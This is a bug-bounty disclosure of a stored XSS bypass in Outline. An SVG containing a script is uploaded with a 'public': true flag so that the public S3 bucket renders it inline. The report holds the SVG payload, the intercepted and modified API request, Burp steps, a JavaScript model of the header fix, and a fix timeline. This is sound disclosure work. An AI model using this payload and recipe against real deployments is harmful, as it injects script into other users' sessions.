[Bypass] Cross-site Scripting (XSS) via file upload in outline/outline


Reported on

Jul 17th 2022

🔒️ Requirements

Privileges: User.

📝 Description

I found a bypass to this report: upload the file with the "public": true parameter. The public folder of the AWS bucket does not force a download when its files are accessed, so the uploaded SVG is rendered inline by the browser and its script executes.

🕵️‍♂️ Proof of Concept

Step 1: Go to your Outline home and create a new note.


Step 2: Start Burp Suite with Proxy -> Intercept on.


Step 3: Insert the following .svg file into the note by typing /file and pressing [ENTER]. The script body is a placeholder; any JavaScript will do.

<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

Step 4: In Burp Suite, press Forward until you see the attachment creation request:

POST /api/attachments.create HTTP/1.1
Host: esaipslack.getoutline.com
Content-Length: 111
Connection: close

{
    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
    "contentType": "image/svg+xml",
    "size": 129,
    "name": "xss.svg"
}

Step 5: Add "public": true to the JSON body:

{
    "public": true,
    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
    "contentType": "image/svg+xml",
    "size": 129,
    "name": "xss.svg"
}

Step 6: Forward the request and turn Intercept off.


Step 7: Go to your note and click the file. Because it is served from the public part of the bucket without a forced download, the browser renders the SVG and runs the script.

  • (screenshot: File)

  • (screenshot: XSS)


🔨 Fix

To fix this vulnerability, I suggest forcing download (a Content-Disposition: attachment response header) on the public part of the AWS bucket too, as is already done for the private part.


An attacker could use this to read sensitive information stored in the AWS bucket.
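The following is an added example written for this page; it is not Outline's code and not the fix commit. It models the policy that steps 1-7 exercise and that the Fix section proposes: the server turns the attachments.create JSON into the fields of an S3 presigned POST, and the bucket later serves the object with whatever Content-Type and Content-Disposition those fields stored. The field names, the public/uploads key prefixes and the bucket-response simulation are assumptions for illustration; the captured request body is the one from step 4.

```javascript
// Added example, not Outline's code. Field names, key prefixes and the
// bucket simulation are assumptions made for illustration.

// Content types a browser executes script from when it renders them as a
// top-level document. A plain image type such as image/png is not one.
const ACTIVE_CONTENT_TYPES = new Set([
  "image/svg+xml",
  "text/html",
  "application/xhtml+xml",
]);

// Parse an attachments.create request body as captured in Burp (step 4).
function parseCreateBody(text) {
  const body = JSON.parse(text);
  return {
    documentId: body.documentId,
    contentType: String(body.contentType || "application/octet-stream"),
    name: String(body.name || "upload"),
    size: Number(body.size || 0),
    isPublic: body.public === true,
  };
}

// Step 5 of the PoC: prepend "public": true to the captured body.
function addPublicFlag(text) {
  return JSON.stringify({ public: true, ...JSON.parse(text) });
}

// Vulnerable policy: only private uploads get a forced download, so a body
// carrying "public": true lands in the public prefix and is served inline.
function presignedFieldsVulnerable(req) {
  const fields = {
    key: `${req.isPublic ? "public" : "uploads"}/${req.name}`,
    acl: req.isPublic ? "public-read" : "private",
    "Content-Type": req.contentType,
  };
  if (!req.isPublic) fields["Content-Disposition"] = "attachment";
  return fields;
}

// Hardened policy (the fix the report suggests): force download for every
// object, public or not. A navigation to the SVG then saves it instead of
// rendering it, so its <script> never runs; <img> embeds are unaffected.
function presignedFieldsHardened(req) {
  return { ...presignedFieldsVulnerable(req), "Content-Disposition": "attachment" };
}

// Headers the bucket would answer for a GET of an object stored with these
// fields (simulation; a real S3 response carries more headers).
function simulateBucketResponse(fields) {
  const headers = { "content-type": fields["Content-Type"] };
  if (fields["Content-Disposition"]) {
    headers["content-disposition"] = fields["Content-Disposition"];
  }
  return headers;
}

// True when navigating to this response would execute script: an active
// content type served without a forced download. Header names and values
// are matched case-insensitively; media-type parameters are ignored.
function rendersAsActiveContent(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);
  const type = (h["content-type"] || "").split(";")[0].trim().toLowerCase();
  const disposition = (h["content-disposition"] || "").trim().toLowerCase();
  return ACTIVE_CONTENT_TYPES.has(type) && !disposition.startsWith("attachment");
}

// The request body captured in step 4 (111 bytes when compact, matching
// the Content-Length header in the report).
const CAPTURED_BODY = JSON.stringify({
  documentId: "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
  contentType: "image/svg+xml",
  size: 129,
  name: "xss.svg",
});

// Walk the bypass end to end under both policies.
function demo() {
  const req = parseCreateBody(addPublicFlag(CAPTURED_BODY));
  const before = rendersAsActiveContent(simulateBucketResponse(presignedFieldsVulnerable(req)));
  const after = rendersAsActiveContent(simulateBucketResponse(presignedFieldsHardened(req)));
  return { before, after };
}

console.log(demo()); // { before: true, after: false }
```

rendersAsActiveContent is also the check to run against a live deployment after the fix: fetch the public attachment URL with curl -I and confirm the response carries Content-Disposition: attachment alongside Content-Type: image/svg+xml. Note that a forced download only neutralises top-level navigation and links; it is the correct control for this report, but any other path that returns attacker-controlled SVG or HTML inline from the same origin would need the same header.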

We are processing your report and will contact the outline team within 24 hours. a year ago
We have contacted a member of the outline team and are waiting to hear back a year ago
Tom Moor validated this vulnerability a year ago
Mizu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor marked this as fixed in v0.65.0 with commit 9dd28d a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE a year ago
